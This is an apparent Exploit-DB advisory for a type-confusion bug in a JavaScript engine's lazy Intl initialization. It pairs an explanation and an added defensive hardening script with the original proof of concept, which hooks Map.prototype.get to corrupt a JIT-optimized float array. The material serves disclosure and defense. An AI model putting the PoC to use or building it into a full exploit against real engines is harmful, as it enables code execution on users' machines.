Vendor: N/A
Author: Anonymous
CVSS: 8.8 (HIGH)
CWE: 843 (Type Confusion)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
Year: 2020

Intl Object Property Access Vulnerability

The vulnerability arises when the Intl object has not yet been initialized: accessing any of its properties triggers lazy initialization, which runs Intl.js without setting the ImplicitCallFlags flag, so the engine's optimized code is not told that the property access had side effects. The PoC redefines Map.prototype.get to intercept the execution of Intl.js and, from inside that hook, sets arr[0] to an empty object while the optimized function still treats arr as a float array. This leads to type confusion and can be leveraged for arbitrary code execution.

Mitigation:

Ensure that the Intl object is initialized before accessing any of its properties.
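As an added example that is not part of the Exploit-DB entry, the following application-level hardening narrows the interception vector the PoC relies on: it forces Intl's lazy initialization up front, then freezes Map.prototype so a later script cannot replace Map.prototype.get, and provides an integrity check. It assumes it runs before any untrusted script (for example as the first inline script) and is defense in depth, not a substitute for the engine-side fix.

```javascript
// Added hardening example (not the exploit author's code). Assumes it runs
// before any untrusted script on the page.

// 1. Touch Intl now so its one-time initialization (Intl.js) runs here,
//    not later in the middle of a JIT-optimized function that assumes a
//    property access has no side effects.
function initIntlEagerly() {
  return typeof Intl.Collator === 'function';
}

// 2. Freeze Map.prototype: the PoC hooks Map.prototype.get to run code
//    while Intl.js executes, so make that property non-writable.
function freezeInterceptionSurface() {
  Object.freeze(Map.prototype);
  return Object.isFrozen(Map.prototype);
}

// 3. Integrity check a defender can run (or report) later: is Map.prototype.get
//    still the engine's native implementation and does it still behave?
function builtinsIntact() {
  const isNative = fn =>
    typeof fn === 'function' &&
    /\[native code\]/.test(Function.prototype.toString.call(fn));
  const probe = new Map([['k', 'v']]);
  return isNative(Map.prototype.get) && probe.get('k') === 'v';
}

// 4. Simulate the PoC's first step after freezing. The assignment silently
//    fails in sloppy mode and throws TypeError in strict mode; either way
//    the native getter must survive. Returns true when the override failed.
function overrideIsBlocked() {
  const original = Map.prototype.get;
  try {
    Map.prototype.get = function () { return 'hijacked'; };
  } catch (e) {
    // TypeError: Cannot assign to read only property 'get' (strict mode)
  }
  const blocked = Map.prototype.get === original;
  if (!blocked) Map.prototype.get = original; // restore if freezing was skipped
  return blocked;
}
```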

Exploit-DB raw data:

/*
If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag.

In the PoC, it redefines Map.prototype.get to intercept the execution of Intl.js.

PoC:
*/

function opt(arr, obj) {
    arr[0] = 1.1;          // arr holds doubles at this point
    obj.x;                 // property access the optimized code treats as side-effect free
    arr[0] = 2.3023e-320;  // written back assuming arr is still a float array
}

// Warm-up loop so that opt is JIT-compiled with the assumption above baked in.
let arr = [1.1];
for (let i = 0; i < 0x10000; i++) {
    opt(arr, {});
}

// Hook that runs while Intl.js executes during the lazy initialization of Intl.
let get = Map.prototype.get;
Map.prototype.get = function (key) {
    Map.prototype.get = get;  // restore the native getter after the first call

    arr[0] = {};              // change arr's element kind while opt is mid-execution

    return this.get(key);
};

// Intl is still uninitialized, so obj.x triggers Intl.js, which calls Map.prototype.get.
opt(arr, Intl);

alert(arr[0]);  // type-confused value